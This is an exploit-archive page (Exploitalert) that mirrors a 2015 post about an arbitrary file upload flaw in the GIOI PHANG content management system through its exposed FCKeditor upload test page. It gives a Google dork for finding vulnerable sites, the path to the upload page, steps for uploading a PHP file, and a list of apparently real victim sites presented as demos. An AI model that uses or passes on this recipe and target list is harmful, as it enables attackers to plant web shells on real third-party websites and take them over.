Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2015120149

Below is a copy:

GIOI PHANG (fckeditor) Arbitrary File Upload Vulnerability########################################################################################
#
# Exploit Title  : GIOI PHANG (fckeditor) Arbitrary File Upload Vulnerability
# Exploit Author : Linux Zone Research Team
# Vendor Homepage: http://tgp.vn
# Google Dork    : intext:Powered (+) Designed THE GIOI PHANG Ltd.
# Date           : 14-December-2015
# Tested On      : Linux - Chrome
# MY HOME        : http://linux-zone.org
#
###############################[ DESCRITION ]#####################################
#
# GIOI PHANG Arbitrary File Upload Vulnerability ..
# Vietnam Content Management System Site By tgp.vn
# Published By Linux Zone Research Team
#
###############################[ LOCATION + Exploit ]#############################
#
# exploit => /editor/filemanager/connectors/uploadtest.html
#
# first go to Target => http://site.com/
#
# Add exploit => http://www.site.com/editor/filemanager/connectors/uploadtest.html
#
# select => Select the "File Uploader"> php ... upload to : Uploaded File URL:
#
##############################[ Demo ]############################################
#
# http://www.lavaXdigital.vn/editor/filemanager/connectors/uploadtest.html
#
# http://hypertecXh.vn/editor/filemanager/connectors/uploadtest.html
#
# http://www.pXhohoiresort.com/editor/filemanager/connectors/uploadtest.html
#
# http://thienphonXg.vn/editor/filemanager/connectors/uploadtest.html
#
# http://tg-electriXc.com.vn/editor/filemanager/connectors/uploadtest.html
#
# http://www.phXohoiresort.com/editor/filemanager/connectors/uploadtest.html
#
###################################################################################
#
#   Hassan Shakeri - Mohammad Habili
#
# Twitter : @ShakeriHassan   -  Fb.com/General.BlackHat
###################################################################################

Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.